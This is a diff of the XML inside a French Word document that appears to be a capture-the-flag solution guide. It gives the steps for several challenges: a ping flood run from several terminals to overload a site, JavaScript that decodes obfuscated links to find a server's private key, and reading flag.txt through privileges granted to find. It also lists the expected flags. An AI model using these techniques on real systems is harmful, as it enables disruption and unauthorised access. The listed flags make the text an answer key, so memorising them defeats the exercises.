-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> afin de surcharger le site web et obtenir le flag</w:t>
+        <w:t>Effectuer une attaque de type DDos afin de surcharger le site web et obtenir le flag</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14977,7 +14603,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId33"/>
+                    <a:blip r:embed="rId36"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -15024,27 +14650,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Lancer cette commande de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>ddos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> « ping -i 0 -s 65000 IP » à partir de plusieurs terminaux pour monter à un débit de 10mb/s</w:t>
+        <w:t>Lancer cette commande de ddos « ping -i 0 -s 65000 IP » à partir de plusieurs terminaux pour monter à un débit de 10mb/s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -15066,7 +14672,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Flag de la faille A : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15076,7 +14681,6 @@
         </w:rPr>
         <w:t>LaTeamSiicEstVraimentLaMeilleure</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15097,7 +14701,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Flag de la faille B : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15107,7 +14710,6 @@
         </w:rPr>
         <w:t>LesDevsDeLaTeamSiicSontVraimentLesMeilleurs</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15359,6 +14961,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07FD05F0" wp14:editId="50BEEC27">
@@ -15376,7 +14979,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId34"/>
+                    <a:blip r:embed="rId37"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -15396,8 +14999,6 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:bookmarkStart w:id="24" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="24"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15597,7 +15198,6 @@
         </w:rPr>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15607,7 +15207,6 @@
         </w:rPr>
         <w:t>ssh</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15770,7 +15369,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35"/>
+                    <a:blip r:embed="rId38"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -15817,58 +15416,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Utiliser une fonction javascript pour </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>decrypter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>tout</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> les lien</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>, et pouvoir trouver le lien contenant la clé prive de connexion au server</w:t>
+        <w:t>Utiliser une fonction javascript pour decrypter tout les lien, et pouvoir trouver le lien contenant la clé prive de connexion au server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15901,7 +15449,6 @@
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -15909,39 +15456,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> links = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>document.getElementsByTagName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("a"); </w:t>
+        <w:t xml:space="preserve">var links = document.getElementsByTagName("a"); </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15981,109 +15496,7 @@
           <w:szCs w:val="20"/>
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>for (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = 0; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &lt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>links.length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">++) { </w:t>
+        <w:t xml:space="preserve">for (var i = 0; i &lt; links.length; i++) { </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16133,79 +15546,9 @@
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> data= links[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>].</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>href</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>.replace</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>('</w:t>
-      </w:r>
-      <w:hyperlink r:id="rId36" w:history="1">
+        <w:t>var data= links[i].href.replace('</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId39" w:history="1">
         <w:r>
           <w:rPr>
             <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -16275,49 +15618,7 @@
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:tab/>
-        <w:t>links[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>].</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>setAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("data", data); </w:t>
+        <w:t xml:space="preserve">links[i].setAttribute("data", data); </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16367,109 +15668,7 @@
           <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:tab/>
-        <w:t>links[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>].</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>href</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>atob</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>(links[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>].</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>getAttribute</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>('data'));</w:t>
+        <w:t>links[i].href = atob(links[i].getAttribute('data'));</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16545,7 +15744,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Flag de la faille A : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16555,7 +15753,6 @@
         </w:rPr>
         <w:t>priceless_bhabha</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16576,7 +15773,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Flag de la faille B : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16586,7 +15782,6 @@
         </w:rPr>
         <w:t>gallant_elion</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16870,7 +16065,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37"/>
+                    <a:blip r:embed="rId40"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -16939,7 +16134,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Flag de la faille A : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16949,7 +16143,6 @@
         </w:rPr>
         <w:t>FlagA</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16970,7 +16163,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Flag de la faille B : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16980,7 +16172,6 @@
         </w:rPr>
         <w:t>FlagB</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17122,37 +16313,15 @@
         </w:rPr>
         <w:t xml:space="preserve">Objectif de la faille : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Elevation</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de privilèges - </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Find</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Elevation de privilèges - Find</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -17219,27 +16388,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Utiliser les droits attribués à </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>find</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> pour lire le fichier flag.txt</w:t>
+        <w:t>Utiliser les droits attribués à find pour lire le fichier flag.txt</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17306,7 +16455,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId38"/>
+                    <a:blip r:embed="rId41"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -17353,47 +16502,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
